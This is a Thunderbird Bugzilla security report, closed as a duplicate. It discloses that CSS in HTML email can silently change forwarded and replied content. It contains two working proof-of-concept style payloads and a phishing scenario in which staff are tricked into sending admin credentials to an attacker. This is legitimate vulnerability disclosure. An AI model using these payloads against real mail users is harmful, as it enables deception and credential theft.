Closed Bug 1796180 Opened 2 years ago Closed 2 years ago

Thunderbird - Modification of replied mail content without knowledge of replier of the mail using CSS

Categories

(Thunderbird :: Security, defect)

Product:
Thunderbird
Component:
Security
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 1688659

People

(Reporter: ramkumarg1605, Unassigned)

References

(
URL
)

Details

(Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(2 files)

thunderbird-poc.mp4
(deleted), video/mp4
Details
thunderbird-reply-poc.mp4
(deleted), video/mp4
Details
Attached video thunderbird-poc.mp4 (deleted) —

Summary:

Hacker can modify the contents of the forwarded mail including message added by forwarder and forwarded headers without the knowledge of forwarder.

Steps to Reproduce:

  1. To reproduce this issue you need 2 email accounts in Thunderbird. eg: victim1@mail.com, victim2@mail.com ( You can use same email if you want ).
  2. Use any mail client to sent HTML email to victim1@mail.com [ Sample HTML code given below ]
  3. Open that mail in victim1 inbox.
  4. Click forward button and add victim2@mail.com in To field and add any message if you want.
  5. Click send button and open that mail in victim2@mail.com inbox.
  6. You can see that the whole contents are changed.

Sample HTML Code:

<style>
  div > p {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div > .moz-forward-container {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div .moz-forward-container .a {
    visibility: hidden !important;
    font-size: 1px !important;
    line-height: 0 !important;
  }
  div .moz-forward-container .b {
    visibility: visible !important;
    font-size: 16px !important;
    line-height: 1.5 !important;
  }
</style>
<div>This content will be visible always<br>
  <span class="a">
    This content will display onle before forward
  </span>
  <span class="b" style="visibility: hidden; font-size: 1px; line-height: 0">
    This content will display only after forward<br>
    Hacker can modify all the contents including message added by forwarder of the mail, forward headers
  </span>
</div>

Impact:

  1. Hacker can make miscommunication between victims.
  2. This will reduces the good user experience and integrity of the mail.
  3. It has high impact because hacker can fully customize the contents of the forwarded mail including message added by forwarder and forwarded headers with his HTML and CSS skill.

Example Attack scenario:

The hacker sends a mail CEO. The CEO will see "I need my account details" and he thinks that the mail was wrongly send to him. so he forward that mail to IT team with the message as "Send him a details". But when the IT team opens the mail they will see " send admin username and password to attacker@mail.com" so they will send admin creadentials to the attacker because their higher officer said that.

Fix:

Don't allow hacker to access the contents outside of this HTML. Put all the HTML contents that received from user into div and modify all the CSS styles by adding the classname of that parent div.
Or you can convert all the CSS to inline CSS and use it for all the places.

Thanks

Flags: sec-bounty?
Group: firefox-core-security → mail-core-security
Product: Firefox → Thunderbird

Hii,

Hacker can also modify the contents of the mail after reply

Sample HTML Code:

<style>
   div blockquote, div p, div .moz-cite-prefix {
    visibility: hidden;
  }
  div blockquote .a {
    visibility: visible !important;
  }
 
</style>
<div class="a" style="visibility: hidden;"><span>This will display only after reply</span></div>
<div class="b"><span>This will display only before reply</span></div>

Example scenario:

The hacker sends a mail CEO. The CEO will see "I need my account details" and he thinks that the mail was wrongly send to him. so he follow up the mail by replying to the mail by adding a email of IT team in To field with the message as "Send him a details". But when the IT team opens the mail they will see " send admin username and password to attacker@mail.com" so they will send admin creadentials to the attacker because their higher officer said that.

Attached video thunderbird-reply-poc.mp4 (deleted) —

POC for Modification of contents after replying mail

You're talking about replies, not forwarding.

See bug 1731198 and bugs linked there. This is more or less a duplicate.

Summary: Thunderbird - Modification of Forwarded mail content without knowledge of forwarder of the mail using CSS → Thunderbird - Modification of replied mail content without knowledge of replier of the mail using CSS

Hacker can modify Both forwarded mail and reply mails. Provided POC for both of them.

Ramkumar, thanks for your report.
We were already aware that CSS can have some unfortunate effects. but I wasn't aware it's that bad.

I cannot reproduce these bugs with gmail.com and Outlook on Windows 11.

Status: UNCONFIRMED → NEW
Ever confirmed: true

This is probably the same report as bug 1688659 ?

Bug 1688659 comment 5 has a link to a good article on this issue.

If this bug is the same, we don't need to keep it hidden.

(In reply to Kai Engert (:KaiE:) from comment #6)

This is probably the same report as bug 1688659 ?

It does seem so.

Note - Thunderbird does not offer bounties

Group: mail-core-security
Status: NEW → RESOLVED
Closed: 2 years ago
Duplicate of bug: 1688659
Flags: sec-bounty?
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: